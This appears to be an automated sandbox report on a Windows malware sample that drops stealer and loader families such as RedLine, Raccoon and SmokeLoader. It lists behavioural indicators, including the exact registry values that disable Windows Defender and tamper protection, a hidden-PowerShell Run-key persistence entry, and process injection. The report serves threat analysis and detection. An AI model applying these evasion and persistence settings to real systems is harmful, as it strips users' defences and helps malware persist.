Malware Analysis Report

2025-08-10 21:54

Sample ID 231025-ft9r5sfc61
Target dfd8798cfe88efc66b69d0be9671d323.exe
SHA256 dd4979e886bd46b6a5c618eb78b4525f36d3fa6ea9c6abb14e42ffa177a46ced
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dd4979e886bd46b6a5c618eb78b4525f36d3fa6ea9c6abb14e42ffa177a46ced

Threat Level: Known bad

The file dfd8798cfe88efc66b69d0be9671d323.exe was found to be: Known bad.

Malicious Activity Summary

Amadey

Modifies Windows Defender Real-time Protection settings

SmokeLoader

Glupteba

RedLine

ZGRat

Glupteba payload

Raccoon Stealer payload

Raccoon

Detect ZGRat V1

DcRat

RedLine payload

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

Checks BIOS information in registry

Checks computer location settings

Windows security modification

Loads dropped DLL

Checks installed software on the system

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-25 05:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-25 05:11

Reported

2023-10-25 05:13

Platform

win7-20231023-en

Max time kernel

98s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\90BF.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\90BF.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\90BF.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\90BF.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\90BF.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\90BF.exe | N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe | N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8DC0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8FB5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\918B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1AD8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2390.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7068.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7855.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\918B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2390.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2390.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7855.exe N/A

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\90BF.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\90BF.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1AD8.exe'\"" | C:\Users\Admin\AppData\Local\Temp\1AD8.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\8D13.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe | N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\MyBurn\is-V3CA5.tmp | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File created | C:\Program Files (x86)\MyBurn\is-LVA35.tmp | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File created | C:\Program Files (x86)\MyBurn\is-6NL1V.tmp | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File created | C:\Program Files (x86)\MyBurn\is-R6F7B.tmp | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File created | C:\Program Files (x86)\MyBurn\Sounds\is-B1GQF.tmp | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File opened for modification | C:\Program Files (x86)\MyBurn\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File created | C:\Program Files (x86)\MyBurn\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File created | C:\Program Files (x86)\MyBurn\is-O55AD.tmp | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File created | C:\Program Files (x86)\MyBurn\is-GPHNV.tmp | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File created | C:\Program Files (x86)\MyBurn\Sounds\is-TR7PA.tmp | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File created | C:\Program Files (x86)\MyBurn\is-FVDFN.tmp | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A
File opened for modification | C:\Program Files (x86)\MyBurn\MyBurn.exe | C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | C:\Users\Admin\AppData\Local\Temp\2390.exe | N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe | N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\90BF.exe | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\K.exe | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 | N/A | C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1260 wrote to memory of 2704 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2632 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8DC0.exe
PID 1260 wrote to memory of 2632 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8DC0.exe
PID 1260 wrote to memory of 2632 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8DC0.exe
PID 1260 wrote to memory of 2632 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8DC0.exe
PID 1260 wrote to memory of 2672 | N/A | N/A | C:\Windows\system32\cmd.exe
PID 1260 wrote to memory of 2672 | N/A | N/A | C:\Windows\system32\cmd.exe
PID 1260 wrote to memory of 2672 | N/A | N/A | C:\Windows\system32\cmd.exe
PID 2704 wrote to memory of 2520 | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 | N/A | C:\Users\Admin\AppData\Local\Temp\8D13.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 1260 wrote to memory of 2548 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8FB5.exe
PID 1260 wrote to memory of 2548 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8FB5.exe
PID 1260 wrote to memory of 2548 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8FB5.exe
PID 1260 wrote to memory of 2548 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8FB5.exe
PID 1260 wrote to memory of 1900 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\90BF.exe
PID 1260 wrote to memory of 1900 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\90BF.exe
PID 1260 wrote to memory of 1900 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\90BF.exe
PID 1260 wrote to memory of 1900 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\90BF.exe
